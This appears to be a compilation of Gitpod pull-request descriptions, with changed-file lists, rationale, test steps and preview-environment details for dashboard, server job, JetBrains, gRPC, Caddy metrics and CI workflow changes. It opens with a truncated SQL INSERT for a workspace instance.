INSERT INTO d_b_workspace_instance
(id, workspaceId, creationTime, startedTime, stoppedTime, lastHeartbeat, ideUrl, status_old, workspaceImage, region, deployedTime, workspaceBaseImage, status, deleted, phasePersisted, configuration, stoppingTime, imageBuildInfo, workspaceClass, usageAttributionId, gitStatus)
VALUES (
'5cd9aced-5ad1-48aa-88db-9164979e204b', 'elvis9876-rusttest-aaaaaaaaaaa', '2023-09-18T12:18:20.214Z', '2023-09-18T12:18:58.742Z', '2023-09-18T12:25:49.600Z', '', 'https://elvis9876-rusttest-aaaaaaaaaaa.ws-eu104.gitpod.io', NULL, …
```
> [server] Introduce job CapGitStatus

- components/dashboard/src/data/configurations/configuration-queries.ts
Because react query assumes `initialData` to be valid and "fresh", it was happy with our default of `null`, which it oftentimes did not refresh and caused many pages to appear as 404s. This PR simply removes the initial value.
From react query's [docs](https://tanstack.com/query/latest/docs/framework/react/guides/initial-query-data#using-initialdata-to-prepopulate-a-query):
> `initialData` is persisted to the cache, so it is not recommended to provide placeholder, partial or incomplete data to this option and instead use `placeholderData`
I don't think we need to use `placeholderData`, since everything seems to work alright even without it.
Fixes ENT-227
Fixes ENT-230
1. [Join my org](https://ft-fix-mis188c1f8e2a.preview.gitpod-dev.com/orgs/join?inviteId=40371bb6-9f57-4241-901d-96b27bf5c44 …
> Fix missing requests for repository details

- .github/workflows/code-nightly.yml
The good ol' chore PR. 
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Code nightly pin to release branch

- components/dashboard/src/data/prebuilds/prebuild-logs-emitter.ts
- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/server/src/workspace/headless-log-controller.ts
When there are no tasks to view, the UI looks a bit funky. This PR makes sure it both maintains structure and displays the appropriate error message.
| <img width="1106" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/d7889793-df37-4dcd-bc56-bb1c1147468a"> | <img width="1106" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/ec94d758-7c77-4b4e-9ad4-00d8a11e9e4e"> | 
Fixes EXP-1852
1. Run a prebuild in a repo like https://github.com/gitpod-io/new or any repo with no `.gitpod.yml`
2. Go to its detail
<ul>
<li><b>🏷️ Name</b> - ft-fix-pred53ef2dd32</li>
<li><b>🔗 URL</b> - <a href="https://ft-fix-pred53ef2dd32.preview.gitpod-dev.com/workspaces" …
> Fix the prebuilds view with no task logs

- components/image-builder-bob/pkg/proxy/proxy.go
Minimal PR to hopefully gain more insights into errors we receive from upstream registries
Related: ENT-120
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options are `all`, `workspace`, `webapp`, `ide`, `jetbrains`, `vscode`, `ssh`. If enabled, `with-preview` and `with-large-vm` …
> [bob] Log body of "Bad Request" responses

- components/ide/jetbrains/backend-plugin/BUILD.yaml
- components/ide/jetbrains/backend-plugin/build.gradle.kts
- components/ide/jetbrains/backend-plugin/build.sh
- components/ide/jetbrains/backend-plugin/gradle.properties
- components/ide/jetbrains/launcher/BUILD.yaml
- components/ide/jetbrains/launcher/main.go
- components/ide/jetbrains/launcher/pkg/constant/version.go
Fixes ENT-238, ENT-205
- It can start workspace with latest stable JetBrains Editor
- idea.log includes `Gitpod Remote xxx` (version includes commit hash)
✅ 
|launcher|backend-plugin|
|:-:|:-:|
|<img width="2213" alt="SCR-20240604-natq" src="https://github.com/gitpod-io/gitpod/assets/20944364/258e69db-70bd-4cfb-8d7f-2e3d4dc3c18e">|<img width="1352" alt="SCR-20240604-nbha" src="https://github.com/gitpod-io/gitpod/assets/20944364/3f7e9131-89a1-45de-93bd-168a1eafa0a1">|
<ul>
<li><b>🏷️ Name</b> - hw-jb-sha</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-sha.preview.gitpod-dev.com/workspaces" target="_blank">hw-jb-sha.preview.gitpod-dev.com/workspaces</a>.</li> …
> Add proper version info to JetBrains launcher and backend-plugin

- components/gitpod-db/src/typeorm/entity/db-workspace.ts
- components/gitpod-db/src/typeorm/migration/1717407555612-WorkspaceDeletionEligibilityTime.ts
- components/gitpod-protocol/src/protocol.ts
- components/server/src/workspace/workspace-service.spec.db.ts
- components/server/src/workspace/workspace-service.ts
Introduces a new column `deletionEligabilityTime` on `d_b_workspace` that contains the time when a workapace is going to be soft deleted.
In this change we only introdcue the field and the logic to update the workspace on
- user triggered workspace start
- user triggered workspace stop
- update git status
Next steps (separated PR):
- add a softDeletionStep for all workspaces that have such a deletionTimestamp
- exclude all workspaces that have such a timestamp from the existing softDeletionStep
Fixes #
<ul>
<li><b>🏷️ Name</b> - se-deletio01de350305</li>
<li><b>🔗 URL</b> - <a href="https://se-deletio01de350305.preview.gitpod-dev.com/workspaces" target="_blank">se-deletio01de350305.preview.gitpod-dev.com/workspaces</a>.</li …
> [server] add workspace.deletionEligabilityTime

- components/gitpod-db/src/typeorm/workspace-db-impl.ts
- components/gitpod-db/src/workspace-db.spec.db.ts
- components/gitpod-db/src/workspace-db.ts
- components/server/src/jobs/workspace-gc.ts
- components/server/src/workspace/workspace-service.ts
Updates the existing workspace garbage collection job, to exclude workspaces that are marked with the new deletionEligabilityTime and adds a nother job, that soft deletes those.
After two weeks we can go back and delete the old job.
Fixes https://linear.app/gitpod/issue/ENT-217/users-complain-about-lost-workspaces-because-they-do-not-understand
<ul>
<li><b>🏷️ Name</b> - se-deletion-job</li>
<li><b>🔗 URL</b> - <a href="https://se-deletion-job.preview.gitpod-dev.com/workspaces" target="_blank">se-deletion-job.preview.gitpod-dev.com/workspaces</a>.</li> …
> [server] update job for eligableDeletionTime

- .github/workflows/jetbrains-auto-update-template.yml
- README.md
- components/ide/jetbrains/image/resolve-latest-ide-version.sh
Fixes ENT-252, [internal chat](https://gitpod.slack.com/archives/C02CBKZEVS8/p1717573798002179?thread_ts=1717530918.249469&cid=C02CBKZEVS8)
See https://github.com/gitpod-io/gitpod/actions/runs/9380965524
RustRover should passed with correct fallback
<ul>
<li><b>🏷️ Name</b> - hw-jb</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb.preview.gitpod-dev.com/workspaces" target="_blank">hw-jb.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-jb-gha.25915</li> …
> [GHA] improve JetBrains EAP jobs

- components/dashboard/package.json
- components/dashboard/src/components/podkit/tabs/Tabs.tsx
- components/dashboard/src/index.css
- components/dashboard/src/workspaces/ConnectToSSHModal.tsx
- components/dashboard/tailwind.config.js
- yarn.lock
This PR adds a tabs component for use in the Dashboard. It tweaks the shadcn UI version quite a bit to keep up with our existing tabs styles.
It also preps us to convert the UI on the prebuilds detail page to be more accessible and consistent in behavior.
1. Start a workspace in the preview environment
2. Open the `Connect with SSH` modal and try the different tabs
<ul>
<li><b>🏷️ Name</b> - ft-proper-tabs</li>
<li><b>🔗 URL</b> - <a href="https://ft-proper-tabs.preview.gitpod-dev.com/workspaces" target="_blank">ft-proper-tabs.preview.gitpod-dev.com/workspaces</a>.</li> …
> Add proper tabs to Podkit

- components/content-service-api/typescript/package.json
- components/gitpod-protocol/package.json
- components/gitpod-protocol/src/util/grpc.ts
- components/ide-metrics-api/typescript-grpc/package.json
- components/ide-service-api/typescript/package.json
- components/image-builder-api/typescript/package.json
- components/server/package.json
- components/server/src/authorization/authorizer.ts
- components/server/src/authorization/spicedb-authorizer.ts
- components/server/src/authorization/spicedb.ts
- components/spicedb/typescript/package.json
- components/supervisor-api/typescript-grpc/package.json
- components/usage-api/typescript/package.json
- components/ws-daemon-api/typescript/package.json
- components/ws-manager-api/typescript/package.json
- components/ws-manager-bridge-api/typescript/package.json
- yarn.lock
This PR is mainly focused on increasing stability for TypeScript gRPC clients:
1. version bumps
- `@grpc/grpc-js` to `1.10.8`
- `@authzed/authzed-node` to `0.15.0`
- and subsequently, to align transitive dependencies on `@grpc/grpc-js`:
- `nice-grpc`
- `ts-proto`
2. improving the re-connection behavior
- explicitly re-connect on UNAVAILABLE (specific to SpiceDB)
- allow to re-fresh DNS resolution more often than every 30s
I tested the re-connection edge case quite extensively, and see consistently better performance than before! :partying_face: 
Still, there might be behavior lurking that we don't see here. 
Fixes ENT-251
- I enabled gRPC debugging:
```
- name: GRPC_NODE_VERBOSITY
value: DEBUG
- name: GRPC_NODE_TRACE
value: all
```
- deleted the `spicedb` pod, and directly after started …
> [server, bridge] Bump grpc-js and authzed clients

- .github/workflows/code-updates.yml
Fixes [internal chat](https://gitpod.slack.com/archives/C045J13P8A1/p1717657782593159?thread_ts=1717622100.144739&cid=C045J13P8A1)
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [GHA] fix branch conflict

- install/installer/pkg/components/content-service/objects.go
- install/installer/pkg/components/content-service/pdb.go
Addes a PodDisruptionBudget maxUnavailable: 1 for content-service.
Note that this is not enough if replicas: is set to 1 (as [this k8s issue](https://github.com/kubernetes/kubernetes/issues/93476#issuecomment-1721495372) is not addressed in 2024...)
Part of ENT-241
<ul>
<li><b>🏷️ Name</b> - gpl-241-pdb</li>
<li><b>🔗 URL</b> - <a href="https://gpl-241-pdb.preview.gitpod-dev.com/workspaces" target="_blank">gpl-241-pdb.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 …
> [installer] content-service: Add PodDisruptionBudget (maxUnavailable: 1)

- WORKSPACE.yaml
Build code version `1.90.0` (`f89a314d7271654be4596696d0fe79b5ef04027c`)
<ul> …
> [VS Code Browser] Build stable code `1.90.0`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.90.0`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.26016</li> …
> [VS Code Browser] Update stable code to `1.90.0`

- components/server/src/jobs/cap-git-status.spec.db.ts
- components/server/src/jobs/cap-git-status.ts
Now I feel stupid: The capping worked, but MARGIN was too low, so we'd always come out a couple of bytes _over_ the budget, and next run re-try the same entries again...  :see_no_evil:
Test confirms it works now.
Fixes ENT-210
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options …
> [server] Fix CapGitStatus job

- components/server/src/jobs/cap-git-status.spec.db.ts
- components/server/src/jobs/cap-git-status.ts
Fixes ENT-210
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] Fix CapGitStatus job (again)

- components/common-go/experiments/flags.go
- components/ide/jetbrains/launcher/main.go
- components/ide/jetbrains/launcher/main_test.go
- components/supervisor/pkg/supervisor/supervisor.go
- components/supervisor/pkg/supervisor/supervisor_test.go
- components/ws-manager-mk2/controllers/create.go
Adds 
```
JAVA_TOOL_OPTIONS="-XX:+UseContainerSupport -XX:ActiveProcessorCount=<cpuCount>"
```
Fixes #
<ul>
<li><b>🏷️ Name</b> - se-java-cpus</li>
<li><b>🔗 URL</b> - <a href="https://se-java-cpus.preview.gitpod-dev.com/workspaces" target="_blank">se-java-cpus.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-java-cpus-gha.25972</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview …
> [java] add java ops for processor count and container support

- components/dashboard/public/index.html
- components/dashboard/src/workspaces/BrowserExtensionBanner.tsx
Instead of relying on `sessionStorage`, which resets for every new tab, rely on `localStorage` with a timestamp valid for 1 month.
Fixes ENT-167
https://ft-less-exc3cc71c569.preview.gitpod-dev.com/workspaces
1. Enable the preview environment in the browser extension (at best, compiled from https://github.com/gitpod-io/browser-extension/commit/0e85d1b18513f5896acbdda62904a3df57cbc9c0, but it is also important to verify with the current version)
2. Go to the new workspace page and verify you are not shown the nudge to install the extension
gitpod:summary
<details>
</details>
<details>
</details>
<details>
Add desired feature flags to the end …
> Improve extension detection in the dashboard

- components/server/src/container-module.ts
- components/server/src/jobs/cap-git-status.ts
- components/server/src/jobs/cap-status.ts
- components/server/src/jobs/runner.ts
Turns out there are more ways we can extend the boundaries of our shapes than I imagined. So we are only fixing the problem at hand how (large gitStatus), either in the old or new place.
Related ENT-210
<ul>
<li><b>🏷️ Name</b> - gpl-only-gitstatus</li>
<li><b>🔗 URL</b> - <a href="https://gpl-only-gitstatus.preview.gitpod-dev.com/workspaces" target="_blank">gpl-only-gitstatus.preview.gitpod-dev.com/workspaces</a>.</li> …
> [server] CapGitStatus: Split work on 'status' into separate job called CapStatus

- components/ws-daemon/pkg/cgroup/plugin_process_priority_v2.go
- components/ws-daemon/pkg/daemon/daemon.go
This PR increases JetBrains IDE process priority (niceness -10)
Fixes ENT-158
1. start a workspace with any JetBrains IDE
2. using `ps -eo pid,nice,args --sort=nice | awk '$2 != 0'` you will see Jetbrains IDE process is -10 (This may take some time)
<ul>
<li><b>🏷️ Name</b> - pd-jb-niceness</li>
<li><b>🔗 URL</b> - <a href="https://pd-jb-niceness.preview.gitpod-dev.com/workspaces" target="_blank">pd-jb-niceness.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 …
> Increase JetBrains IDE process priority

- .github/workflows/update-image-digest.yml
- install/installer/cmd/mirror_list.go
- install/installer/go.mod
- install/installer/pkg/common/render.go
- install/installer/pkg/components/redis/constants.go
- install/installer/pkg/components/redis/deployment.go
[installer] use image digest for redis image
Fixes ENG-1717
<ul>
<li><b>🏷️ Name</b> - pd-image-dbfcbfa4290</li>
<li><b>🔗 URL</b> - <a href="https://pd-image-dbfcbfa4290.preview.gitpod-dev.com/workspaces" target="_blank">pd-image-dbfcbfa4290.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-image-digest-redis-gha.23350</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-pd-image- …
> [installer] use image digest for redis image

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
Adds the following to the prebuild detail page:
1. Persistence of the actively selected task via URL hash
2. A margin for tab triggers, so that the focus ring can fit in there properly
3. Disables analytics tracking on the buttons changing the currently displayed task, so that our analytics don't show us what users name their tasks.
https://ft-prebuild-ui-qol.preview.gitpod-dev.com/workspaces
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> QoL improvements for the prebuild UI

- README.md
- components/dashboard/src/teams/TeamAuthentication.tsx
- components/dashboard/src/teams/TeamPolicies.tsx
- components/server/src/bitbucket/README.md
- components/server/src/github/api.ts
- components/server/src/user/token-service.ts
Improves consistency and adherence to brand guidelines of both Bitbucket and us :). Also improves copy for the new org settings pages.
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Improve dashboard and readme copy

- install/installer/pkg/components/registry-facade/daemonset.go
- install/installer/pkg/components/ws-daemon/daemonset.go
Registry-facade and ws-daemon are only deployed to workspace nodes and should be able to tolerate all taints on these nodes regardless of where they are coming from
Fixes ENT-265
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Tolerate all taints

- components/proxy/conf/Caddyfile
Presently, we're only getting `caddy_reverse_proxy_upstreams_healthy` metric from caddy, which we cannot inspect to alert based on status code (like for 50x errors).
This change makes it possible to inspect caddy metrics like `caddy_http_response_duration_seconds_count{code=~"401|502"}`. 
Related to ENT-268
From the preview, start a workspace, port-forward Grafana, and do `increase(caddy_http_response_duration_seconds_count{}[5m])`
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
<summary>Preview Environment / Integration …
>  [proxy] enable metrics for Caddy

- components/server/src/auth/auth-provider-service.ts
We received this error report:
The cause is that the customer's BitBucketserver takes ~10 seconds to respond to unauthenticated users:
```
time curl https://<host>/
curl https://<host>/  0.01s user 0.01s system 0% cpu 9.341 total
```
This PR increases the timeout from 2 to 15 seconds to avoid the timeout. 
See [here](https://github.com/node-fetch/node-fetch/blob/9b9d45881e5ca68757077726b3c0ecf8fdca1f29/README.md?plain=1#L375) for the docs of the node-fetch timeout param.
Fixes # [Internal Slack conversation](https://gitpod.slack.com/archives/C059NL06LAW/p1718201909280499?thread_ts=1695810903.200579&cid=C059NL06LAW).
gitpod:summary
<details>
</details>
<details> …
> Increase OAuth isHostReachable timeout from 2 to 15 seconds

- components/common-go/experiments/flags.go
- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/hooks/use-user-loader.ts
- components/dashboard/src/start/VerifyModal.tsx
- components/dashboard/src/user-settings/PageWithSettingsSubMenu.tsx
- components/dashboard/src/user-settings/PersonalAccessTokens.tsx
- components/dashboard/src/user-settings/PersonalAccessTokensCreateView.tsx
- components/public-api-server/pkg/apiv1/tokens.go
- components/public-api-server/pkg/apiv1/tokens_test.go
- components/server/src/api/verification-service-api.ts
- components/server/src/workspace/gitpod-server-impl.ts
Drops the following feature flags:
- [newProjectIncrementalRepoSearchBBS](https://github.com/gitpod-io/gitpod/commit/4302056da0c27ffda269de4b5ec642ac1045d65c)
- [doRetryUserLoader](https://github.com/gitpod-io/gitpod/commit/cec8ff0f0b66c4c3d555ad2499a036e0ab0014c1)
- [phoneVerificationByCall](https://github.com/gitpod-io/gitpod/commit/6c3a6c74c171ba3e4656ca2eec7e3e3d45b3c0ee)
- [personalAccessTokensEnabled](https://github.com/gitpod-io/gitpod/commit/cd9c2cee572b805b93b8328a9f62e6e8db964327)
Related: ENT-277
- tests are green
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [cleanup] Remove various feature flags I

- components/dashboard/src/service/public-api.ts
- components/server/src/api/server.ts
- components/server/src/auth/auth-provider-service.spec.db.ts
- components/server/src/auth/bearer-authenticator.spec.db.ts
- components/server/src/auth/resource-access.ts
- components/server/src/authorization/authorizer.spec.db.ts
- components/server/src/authorization/authorizer.ts
- components/server/src/authorization/caching-spicedb-authorizer.spec.db.ts
- components/server/src/authorization/relationship-updater.spec.db.ts
- components/server/src/authorization/relationship-updater.ts
- components/server/src/authorization/spicedb-authorizer.ts
- components/server/src/orgs/organization-service.spec.db.ts
- components/server/src/orgs/usage-service.spec.db.ts
- components/server/src/projects/projects-service.spec.db.ts
- components/server/src/scm/scm-service.spec.db.ts
- components/server/src/user/env-var-service.spec.db.ts
- components/server/src/user/gitpod-token-service.spec.db.ts
- components/server/src/user/sshkey-service.spec.db.ts
- components/server/src/user/token-service.spec.db.ts
- components/server/src/user/user-service.spec.db.ts
- components/server/src/workspace/context-service.spec.db.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/server/src/workspace/headless-log-controller.ts
- components/server/src/workspace/workspace-service.spec.db.ts
Drops these feature flags we have not touched in month:
- centralizedPermissions
- spicedb_relationship_updates
Fixes ENT-276
- tests are all green
<ul>
<li><b>🏷️ Name</b> - gpl-270-ff-removal</li>
<li><b>🔗 URL</b> - <a href="https://gpl-270-ff-removal.preview.gitpod-dev.com/workspaces" target="_blank">gpl-270-ff-removal.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-270-ff-removal-gha.26298</li> …
> [server] Remove old FGA feature flags:

- components/proxy/conf/Caddyfile
Reverts gitpod-io/gitpod#19882, and removes the filter which was causing caddy to fail and proxy to crash loop.
This configuration causes Caddy to emit additional metrics, which we can later use in alerts.
Related to ENT-268
See test results in comments below. If you wish, test in the [preview](https://revert-1981b51a215b4.preview.gitpod-dev.com/workspaces), too.
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [proxy] enable metrics for Caddy again

- components/common-go/experiments/flags.go
- components/supervisor/pkg/serverapi/metrics.go
- components/supervisor/pkg/serverapi/publicapi.go
- components/supervisor/pkg/supervisor/supervisor.go
Fixes [internal doc](https://www.notion.so/gitpod/supervisor_experimental_publicapi-89efa2ae7e7e4899bf3ae0086ee4f862?pvs=4)
Workspace should work well like before:
- git push
- open port
- git status update
- ...
✅ 
|Workspace start and git status|Port Public|
|:-:|:-:|
|<img width="1143" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/91139bd7-7566-4d77-a65c-c8ee8ac7dc4c">|<img width="1074" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/806be171-9812-41e5-9bab-2f15823c52bc">|
<ul>
<li><b>🏷️ Name</b> - hw-ff-1</li>
<li><b>🔗 URL</b> - <a href="https://hw-ff-1.preview.gitpod-dev.com/workspaces" target="_blank">hw-ff-1.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 …
> [cleanup] remove FF for supervisor publicapi

- .github/workflows/code-updates.yml
Fixes openvscode-server release will be skipped if any jobs above is skipped
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details> …
> [gha] do not skip openvscode-server release

- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/onboarding/StepUserInfo.tsx
- components/server/src/auth/verification-service.ts
- components/server/src/billing/entitlement-service-ubp.ts
- components/server/src/billing/entitlement-service.ts
- components/server/src/jobs/cap-status.ts
- components/server/src/workspace/workspace-service.ts
Drops:
- [guessWorkspaceRegion](https://github.com/gitpod-io/gitpod/commit/01e1637ade1012807777a44919a47433cca1a5fc)
- Verified that it works for Dedicated/non-GCP as well :heavy_check_mark: We can double check in Dogfood
- [api_validate_git_status_length](https://github.com/gitpod-io/gitpod/commit/40065a0dde29302e5b04339942ba60c958c660c8)
- [isPhoneVerificationEnabled](https://github.com/gitpod-io/gitpod/pull/19899/commits/01cea5e9a4cdacfe9d04e606481f11956d447e4a)
- the call-site had to be slighty moved, so it's not called in Dedicated (we can verify in Dogfood, but the code is very clear)
- [linkedinConnectionForOnboarding](https://github.com/gitpod-io/gitpod/pull/19899/commits/6143187f6d9bacc49e96ee3d274693f8830daee8)
Fixes ENT-289 …
> [cleanup] Drop more feature flags

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.90.1`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.26380</li> …
> [VS Code Browser] Update stable code to `1.90.1`

- components/dashboard/src/components/PrebuildLogs.tsx
- components/dashboard/src/data/prebuilds/prebuild-queries.ts
- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/dashboard/src/prebuilds/list/PrebuildList.tsx
- components/dashboard/src/prebuilds/list/PrebuildListItem.tsx
- components/dashboard/src/projects/Prebuilds.tsx
- components/dashboard/src/projects/prebuild-utils.tsx
This PR:
- does make sure we are using the same `PrebuildStatus` component everywhere
- registers listeners for not-done prebuilds on the `PrebuildList` page
Fixes ENT-271
Fixes ENT-231
- [join my org](https://gpl-271-pb-ready.preview.gitpod-dev.com/orgs/join?inviteId=84e2e93b-f0b8-4c94-b50a-eb1eeb736c78)
- [trigger a prebuild](https://gpl-271-pb-ready.preview.gitpod-dev.com/prebuilds) on [gpl/multiple-tasks-short](https://github.com/geropl/gitpod-test-repo/tree/gpl/multiple-tasks-short)
- watch the prebuild list + the prebuild detail view in parallel, and note how they both update after ~1min :heavy_check_mark: 
<ul>
<li><b>🏷️ Name</b> - gpl-271-pb-ready</li> …
> [dashboard] Fix PrebuildStatus rendering and updating (on PrebuildList)

- components/ide/jetbrains/launcher/main.go
Fixes [[internal chat](https://gitpod.slack.com/archives/C02CBKZEVS8/p1718369846141049)]
Relates https://github.com/gitpod-io/gitpod/pull/19846
- Open https://github.com/gitpod-io/gitpod in Gitpod with IntelliJ
- Open with Gateway x IntelliJ, there should have **no warning** with content [^1]
```
The use of Java options environment variables detected. Such variables override IDE configuration files (*.vmoptions) and may cause performance and stability issues. Please consider deleting these variables: JAVA_TOOL_OPTIONS.
```
- Exec command below, should output `Picked up JAVA_TOOL_OPTIONS: -XX:+UseContainerSupport -XX:ActiveProcessorCount=1`
```
cd components/ide/jetbrains/backend-plugin/
./gradlew -i
```
[^1]: warning example <img width="744" alt="image" …
> [JetBrains] fix alert for JAVA_TOOL_OPTIONS

- components/ide/jetbrains/backend-plugin/src/main/kotlin/io/gitpod/jetbrains/remote/AbstractGitpodTerminalService.kt
If there's a task finished and it terminated the terminal before IntelliJ client connected, tasks will not show, for [[example](https://github.com/gitpod-io/gitpod/blob/9c57b8f2d77326e47f4b7ca7f05e7bea365a1fbd/.gitpod.yml#L45-L49)]: `exit 0`
Fixes #
- Log into preview env
- Open workspace with gitpod-io/gitpod repo with IntelliJ
- Wait for 2 minutes before open IntelliJ
- Tasks should show
✅ 
<ul>
<li><b>🏷️ Name</b> - hw-jb-task</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-task.preview.gitpod-dev.com/workspaces" target="_blank">hw-jb-task.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39 …
> [JetBrains] improve task terminals

- components/ide-service-api/go/config/ideconfig.go
- components/ide-service/BUILD.yaml
- components/ide-service/pkg/server/ideconfig.go
- components/ide-service/pkg/server/testdata/ideconfig_happypath.golden
- components/ide-service/pkg/server/testdata/ideconfig_happypath_resolve.golden
- components/ide-service/pkg/server/testdata/ideconfig_happypath_versions.golden
- components/ide-service/pkg/server/testdata/ideconfig_happypath_versions.json
- components/ide-service/pkg/server/testdata/ideconfig_idetype_not_correct.golden
- components/ide-service/pkg/server/testdata/ideconfig_idetype_unknown.golden
- components/ide-service/pkg/server/testdata/resolve_ws_config_regular_code_invalid.golden
- components/ide-service/pkg/server/testdata/resolve_ws_config_regular_code_invalid_version.golden
- components/ide-service/pkg/server/testdata/resolve_ws_config_regular_code_valid_version.golden
- components/ide/gha-update-image/index-jb.ts
- components/ide/gha-update-image/lib/jb-pin-version.ts
- components/ide/gha-update-image/lib/jb-stable-version.ts
- install/installer/pkg/components/ide-service/ide-configmap.json
Make sure the first item of versions in ide config is added by `ide-service` and align with latest stable version's values
Fixes ENT-298, ENT-299
- Latest stable version (check WORKSPACE.yaml) is pinnable on dashboard
- Pin version of IntelliJ with `2024.1.3`, it should be able to open workspace with
- ~~Check `ide-config` if the latest stable versions' image info is the same as that first one in versions field~~
- Check logs of `ide-service` (see https://github.com/gitpod-io/gitpod/pull/19911/commits/147a140c355acfb559934ff0553323826902da4c) the latest stable versions' image info is the same as that first one in versions field
<ul>
<li><b>🏷️ Name</b> - hw-ide-version</li> …
> Align experience of latest pinned and unpinned version

- .github/workflows/code-nightly.yml
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Switch code nightly job to `gp-code/main`

- components/ide/gha-update-image/check-code-build.ts
- components/ide/gha-update-image/index-code.ts
- components/ide/gha-update-image/lib/code-pin-version.ts
- components/ide/gha-update-image/lib/common.ts
- components/ide/gha-update-image/lib/jb-stable-version.ts
- install/installer/pkg/components/ide-service/ide-configmap.json
Reverts gitpod-io/gitpod#19915
Fixes ENT-308
**regression test**
- VS Code Browser version `1.90.1` is pinnable in preview https://revert-19952ef7e32d6.preview.gitpod-dev.com/settings/policy
**scripts validate**
Open this PR with Gtipod, and exec commands below
```
cd /workspace/gitpod/components/ide/gha-update-image
npm i -g bun
yarn
bun run index-jb.ts
bun run index-code.ts
bun run check-code-build.ts --branch gp-code/release/1.89
bun run index-code.ts
```
<ul>
<li><b>🏷️ Name</b> - revert-19952ef7e32d6</li>
<li><b>🔗 URL</b> - <a href="https://revert-19952ef7e32d6.preview.gitpod-dev.com/workspaces" target="_blank">revert-19952ef7e32d6.preview.gitpod-dev.com/workspaces</a>.</li> …
> Improve  ide images updating GHA

- components/ide/gha-update-image/lib/code-pin-version.ts
Guard for https://github.com/gitpod-io/gitpod/pull/19924/files#r1644827889
Fixes #
No need to test
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] thrown when fetching empty version

- .github/workflows/code-build.yaml
- .github/workflows/code-updates.yml
Fix `oci-tool` missing leads GHA always got empty version
Fixes #
✅  See https://github.com/gitpod-io/gitpod/actions/runs/9570557624/job/26385584626
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] add `oci-tool` to fix code updates errors

- .gitattributes
Related https://github.com/gitpod-io/gitpod/pull/19868
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Add Java & Kotlin generated files to gitattributes

- .github/workflows/code-updates.yml
- components/ide/gha-update-image/index-code.ts
- components/ide/gha-update-image/lib/code-pin-version.ts
https://github.com/gitpod-io/gitpod/pull/19932 should be image update PR, but not version release PR
Fixes https://github.com/gitpod-io/gitpod/pull/19932
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] correct code new version detection

- components/gitpod-db/src/typeorm/workspace-db-impl.ts
- components/gitpod-db/src/workspace-db.spec.db.ts
- components/gitpod-db/src/workspace-db.ts
- components/server/src/jobs/workspace-gc.ts
Remove the now superceded
Fixes https://linear.app/gitpod/issue/ENT-316/remove-old-workspace-gc-logic
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [server] remove old workspace gc logic

- operations/observability/mixins/meta/dashboards/components/proxy.json
- operations/observability/mixins/meta/rules/proxy.yaml
Add Caddy metrics panel to our Proxy component's dashboard
Related to ENT-268
Depends on https://github.com/gitpod-io/runbooks/pull/431
When pushed to Grafana [manually](https://grafana.gitpod.io/d/proxy2/gitpod-component-proxy?orgId=1&refresh=5m&from=now-1h&to=now), the new panels look like so in PAYG:
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick …
> [obs] Add Caddy metrics to Proxy dashboard & Caddy alerts

- .github/workflows/code-nightly.yml
- components/ide/code/BUILD.yaml
- components/ide/code/leeway.Dockerfile
- components/ide/gha-update-image/lib/code-pin-version.ts
- components/ide/gha-update-image/lib/common.ts
- components/ide/gha-update-image/lib/jb-pin-version.ts
- install/installer/cmd/ide.go
- install/installer/cmd/ideconfigmap.go
- install/installer/pkg/components/ide-service/ide_config_configmap.go
- test/run.sh
